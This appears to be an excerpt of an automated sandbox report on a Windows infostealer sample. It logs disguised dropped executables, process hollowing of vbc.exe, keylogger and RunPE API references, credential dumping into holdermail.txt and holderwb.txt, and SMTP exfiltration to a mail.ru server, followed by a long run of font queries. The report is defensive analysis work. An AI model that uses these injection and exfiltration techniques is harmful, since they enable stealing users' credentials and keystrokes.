                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe | Code function: 1_2_00405CAA GetModuleHandleA,LoadLibraryA,GetProcAddress
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Process queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Process queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Process queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 2336
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Process token adjusted: Debug
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe | Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_05207920 LdrInitializeThunk
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion:

                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe | Domain query: smtp.mail.ru
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe | Network Connect: 94.100.180.160 587
                    Allocates memory in foreign processes
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Sample uses process hollowing technique
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    .NET source code references suspicious native API functions
                    Source: taskhost.exe.1.dr, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: taskhost.exe.1.dr, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: iExplorer.exe.1.dr, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: iExplorer.exe.1.dr, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: WindowsUpdate.exe.5.dr, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: WindowsUpdate.exe.5.dr, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: Windows Update.exe.7.dr, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: Windows Update.exe.7.dr, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe | Process created: C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe 'C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe'
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe 'C:\Users\user\AppData\Local\Temp\svchost.exe'
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe | Process created: C:\Users\user\AppData\Local\Temp\taskhost.exe 'C:\Users\user\AppData\Local\Temp\taskhost.exe'
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe | Process created: C:\Users\user\AppData\Local\Temp\iExplorer.exe 'C:\Users\user\AppData\Local\Temp\iExplorer.exe'
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process created: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe'
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2200
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Process created: C:\Users\user\AppData\Roaming\Windows Update.exe 'C:\Users\user\AppData\Roaming\Windows Update.exe'
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2324
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 2336
                    Source: svchost.exe, 0000000A.00000002.491966567.0000000003ACF000.00000004.00000001.sdmp | Binary or memory string: edProgram Manager
                    Source: svchost.exe, 0000000A.00000002.491966567.0000000003ACF000.00000004.00000001.sdmp | Binary or memory string: Program Manager(
                    Source: svchost.exe, 0000000A.00000002.491966567.0000000003ACF000.00000004.00000001.sdmp | Binary or memory string: Program Manager
                    Source: svchost.exe, 0000000A.00000002.492263729.0000000003CFD000.00000004.00000001.sdmp | Binary or memory string: |-----Program Manager (11:09:22 PM) -----|
                    Source: svchost.exe, 0000000A.00000002.492263729.0000000003CFD000.00000004.00000001.sdmp | Binary or memory string: |-----Program Manager (12:19:16 PM) -----|
                    Source: svchost.exe, 0000000A.00000002.492263729.0000000003CFD000.00000004.00000001.sdmp | Binary or memory string: |-----Program Manager (10:59:22 PM) -----|
                    Source: svchost.exe, 0000000A.00000002.491966567.0000000003ACF000.00000004.00000001.sdmp | Binary or memory string: |-----Program Manager (9:36:07 AM) -----|
                    Source: svchost.exe, 0000000A.00000002.492263729.0000000003CFD000.00000004.00000001.sdmp | Binary or memory string: |-----Program Manager (12:22:36 PM) -----|
                    Source: svchost.exe, 0000000A.00000002.492263729.0000000003CFD000.00000004.00000001.sdmp | Binary or memory string: |-----Program Manager (12:30:56 PM) -----|
                    Source: svchost.exe, 0000000A.00000002.491966567.0000000003ACF000.00000004.00000001.sdmp | Binary or memory string: |-----Program Manager (9:47:47 AM) -----|
                    Source: svchost.exe, 0000000A.00000002.491966567.0000000003ACF000.00000004.00000001.sdmp | Binary or memory string: |-----Program Manager (9:39:27 AM) -----|
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
